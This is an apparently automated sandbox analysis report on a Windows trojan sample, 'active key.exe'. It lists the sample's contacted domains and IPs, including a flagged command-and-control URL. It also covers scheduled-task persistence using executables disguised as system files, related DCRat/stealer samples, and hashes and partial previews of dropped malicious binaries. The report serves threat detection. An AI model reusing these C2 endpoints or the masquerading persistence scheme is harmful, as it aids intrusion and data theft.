                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.microsoft.co0%Avira URL Cloudsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                    http://crl.microsJ0%Avira URL Cloudsafe
                    http://osoft.co0%Avira URL Cloudsafe
                    http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                    http://osoft.co0%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%Avira URL Cloudsafe
                    https://keyauth.win/api/1.1/ace0%Avira URL Cloudsafe
                    https://keyauth.win/api/1.1/pacec0%Avira URL Cloudsafe
                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl070%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    http://go.mic0%Avira URL Cloudsafe
                    https://keyauth.win/api/1.1/0%Avira URL Cloudsafe
                    http://www.microsoft.co1%VirustotalBrowse
                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl070%VirustotalBrowse
                    https://keyauth.win/api/1.1/ace0%VirustotalBrowse
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php100%Avira URL Cloudphishing
                    https://keyauth.win/api/1.1/0%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse
                    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%VirustotalBrowse
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php10%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    keyauth.win
                    		104.26.0.5
                    		truefalseunknown
                    128538cm.n9shteam3.top
                    		80.211.144.156
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.phptrue
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3492498621.00000200716E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.microsJpowershell.exe, 00000025.00000002.3755191167.00000233FA7B4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000001C.00000002.3723545996.0000015C51A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3653818428.000002267029B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.copowershell.exe, 00000022.00000002.3806662276.00000160C3F79000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://osoft.copowershell.exe, 00000024.00000002.3680216370.00000200798D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cractive key.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.powershell.exe, 0000001C.00000002.3742689311.0000015C51A84000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://keyauth.win/api/1.1/pacecactive key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://keyauth.win/api/1.1/aceactive key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07active key.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://go.micntoskrnl2.exe, 00000005.00000002.2300166294.0000000000B23000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.haxx.se/docs/http-cookies.htmlactive key.exefalse
                    • URL Reputation: safe
                    		unknown
                    https://keyauth.win/api/1.1/active key.exe, 00000000.00000002.2261569958.000002CBC844C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.mpowershell.exe, 0000001D.00000002.3765455976.00000293A57F3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pki-ocsp.symauth.com0active key.exefalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 0000001C.00000002.3479314878.0000015C496E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namentoskrnl2.exe, 00000005.00000002.2301243668.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.26.0.5
                    		keyauth.winUnited States
                    		13335CLOUDFLARENETUSfalse
                    80.211.144.156
                    		128538cm.n9shteam3.topItaly
                    		31034ARUBA-ASNITtrue

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1502880
                    Start date and time:2024-09-02 13:32:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:57
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:active key.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@59/50@2/3
                    EGA Information:
                    • Successful, ratio: 7.7%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, schtasks.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target XUkPLaESKIkbWXdxlvmVntDv.exe, PID 7672 because it is empty
                    • Execution Graph export aborted for target XUkPLaESKIkbWXdxlvmVntDv.exe, PID 7744 because it is empty
                    • Execution Graph export aborted for target active key.exe, PID 6424 because there are no executed function
                    • Execution Graph export aborted for target explorer.exe, PID 7200 because it is empty
                    • Execution Graph export aborted for target explorer.exe, PID 7224 because it is empty
                    • Execution Graph export aborted for target ntoskrnl2.exe, PID 7652 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2348 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 3940 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5112 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5504 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:33:20API Interceptor159x Sleep call for process: powershell.exe modified
                    07:33:41API Interceptor1721691x Sleep call for process: ntoskrnl2.exe modified
                    13:33:18Task SchedulerRun new task: backgroundTaskHost path: "C:\Users\Public\Pictures\backgroundTaskHost.exe"
                    13:33:18Task SchedulerRun new task: backgroundTaskHostb path: "C:\Users\Public\Pictures\backgroundTaskHost.exe"
                    13:33:18Task SchedulerRun new task: explorer path: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    13:33:19Task SchedulerRun new task: explorere path: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    13:33:19Task SchedulerRun new task: fontdrvhost path: "C:\Windows\tracing\fontdrvhost.exe"
                    13:33:19Task SchedulerRun new task: fontdrvhostf path: "C:\Windows\tracing\fontdrvhost.exe"
                    13:33:20Task SchedulerRun new task: ntoskrnl2 path: "C:\Windows\System32\ntoskrnl2.exe"
                    13:33:20Task SchedulerRun new task: ntoskrnl2n path: "C:\Windows\System32\ntoskrnl2.exe"
                    13:33:20Task SchedulerRun new task: XUkPLaESKIkbWXdxlvmVntDv path: "C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe"
                    13:33:20Task SchedulerRun new task: XUkPLaESKIkbWXdxlvmVntDvX path: "C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe"

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.26.0.5SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.26384.14234.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.GenericKD.73779679.12724.23011.exeGet hashmaliciousUnknownBrowse
                          PmTPg1LYm4.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exeGet hashmaliciousUnknownBrowse
                                Loader.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win64.Evo-gen.2830.16242.exeGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Win64.Evo-gen.25703.16605.exeGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.W64.Agent.NV.tr.9318.30020.exeGet hashmaliciousUnknownBrowse
                                        80.211.144.156iwtYgAXvKB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 951499cm.nyashtech.top/sqlcentralUploads.php
                                        cuAvoExY41.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • hvatit.top/dbwp.php
                                        rRNxo8cmA3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 222725cm.n9shka.top/vmjavascriptUpdateprotectlinuxWppublicTemp.php
                                        9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 334972cm.n9shka.top/PhpPacketlowProcessGameprotectprivatecentral.php
                                        i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • otkaz.top/PhpWordpress.php
                                        z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • mamka.top/phpjssecureCpuApilinuxWp.php
                                        4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php
                                        BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 426314cm.n9sh.top/vmupdateAuthsqlDbAsyncTrackDlecentralDownloads.php
                                        foIdlOzWvH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 921773cm.n9sh.top/providerExternalimageVideojsPacketprocessorDefaultDbLinux.php
                                        3O5Uh9S6wK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 951499cm.nyashtech.top/sqlcentralUploads.php

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        keyauth.win4.7.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.1.5
                                        SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.72.57
                                        SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Win64.MalwareX-gen.29811.31558.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.1.5
                                        SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.72.57
                                        SecuriteInfo.com.Win32.Evo-gen.24813.27582.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.1.5
                                        SecuriteInfo.com.Win64.MalwareX-gen.26384.14234.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Trojan.GenericKD.73779679.12724.23011.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.72.57
                                        SecuriteInfo.com.Trojan.MulDrop28.40.18458.1049.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.72.57

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ARUBA-ASNITsUx2hVYtFa.exeGet hashmaliciousDCRatBrowse
                                        • 80.211.144.156
                                        8pFAG4LFR2.exeGet hashmaliciousDCRatBrowse
                                        • 80.211.144.156
                                        iwtYgAXvKB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        cuAvoExY41.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        rRNxo8cmA3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Ftarmacaccdpt273942.s3.eu-west-2.amazonaws.com%2Ftarmacaccdpt273942.htm/1/010301919fd504bf-f1140bbf-5bf1-4efc-a5af-08f5427832cc-000000/_gNHUUKrZwooc5axkSOIwuxNPxE=174Get hashmaliciousHTMLPhisherBrowse
                                        • 89.46.108.56
                                        9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 80.211.144.156
                                        CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                        • 172.64.41.3
                                        RFQ.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                        • 188.114.96.3
                                        Unmovablety.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 188.114.96.3
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 172.64.41.3
                                        REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.192.47
                                        Request for Quotation #P01042.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        REMITTANCE ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.13.205
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 172.64.41.3
                                        ROOMING 24034 Period Check-in on July 5th and departure on July 15th, 2024.batGet hashmaliciousUnknownBrowse
                                        • 172.64.155.119

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ce5f3254611a8c095a3d821d44539877SecuriteInfo.com.Win64.MalwareX-gen.29811.31558.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Trojan.GenericKD.73779679.12724.23011.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        94QPWIgK429Q17lm.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        o7Da7jGSSj.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        PmTPg1LYm4.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Win64.MalwareX-gen.1457.25976.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        aj.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        Loader (3).exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5
                                        SecuriteInfo.com.Win64.Evo-gen.2830.16242.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.0.5

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\Desktop\DnHERPdP.logcuAvoExY41.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          TwfUz3FuO7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      ugRGgCJhQl.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        eCGKhYZtgx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          czcgyt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                            Created / dropped Files

                                                            C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e088

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (795), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):795
                                                            Entropy (8bit):5.8926212448254764
                                                            Encrypted:false
                                                            SSDEEP:24:OEc8aS5zJaF/hT/bkdUhSmrM7JC2AinxAdCnk:OeIhTzknmrr2C
                                                            MD5:C9B5A4086C81C7B0FD4E5364ABCDD0BB
                                                            SHA1:7A0A41B862532F2BDCC210EB9D9C286282424D24
                                                            SHA-256:B80DB5B8C8FB76CDE88BA42FB561D27C4419357C294AA659AB52423DCC49DE6B
                                                            SHA-512:E64497C28777E40C08923156ED69C1524A09208C6D0E26244DF99AE7BAE5BDF14F69CE8533522DC92B84159077C01AEB06930B217E00595D93585C272EFC8E7E
                                                            Malicious:false
                                                            Preview:lhA8maAQdCWM2bnWUlOUJixP2Drt4IGzmnorJGzIGDPRc8L9FyXQQ7nCtvFjsQVU5gkOx5MNvGOFTgx42snGv0jo9l8YAQazs4V5Y6MKlJeKtitM7LrAmPjE75OL7xNfpYXYL1f5fdemVZ4b2wayjaMcVR8csAMy59eULVBGqveJu6siAwTKXY5PM4C33CMfQqqW4jQhuUIx5CrYiac5rBbhDOIQSHMnj92EPWnagvaCQITJMnVdkQxOPJSpb9PnHeN6KnJLwBZ6lYR549EowtDSLnzGE89hgw4v4X9jeJqi11m01Wuc5k1Yb5ugxCHyC2ZzdgAh9fJmCebUA8OrNgl55gT9ncvbC2g9bxWVVNcabOV7eZfyyZkfQe47MB4htrkJ7b3Nm2V9ELdqKVeN76nmRAs63ZIUT5qtoL9CgSM5DkbEAOw0gqkxD726t6UMtBqJfuB8Vcqotsjqjo6onRxmU2prTDTk7ALB4SiQMxfEA5DVYLXEApjbOEynETpSJGrtghwQFqczwsmZyTTIpOkSatxze5L2IM53OUy0YG9UNtofcYyuAhn4gYSxt7wJejrkxsLefctjOPFrERWFHa2kiAWzCBHbTzzoCEstMUPixEpQSlsbkqCEqGBwWVbdVRPYaboAjn2wLUxeUFgaSp1nxv75C6X12vMfzR016r26xP2WThbQzBKpamloet8mQB4ZHRpDPpekw4zh2klefHC1kgFNpLXMtQqwVdOC1XAJhj3gwDw3HdHJ9DykMcXERR1gNCMYWjnHG2UBniamYeFQJhw

                                                            C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
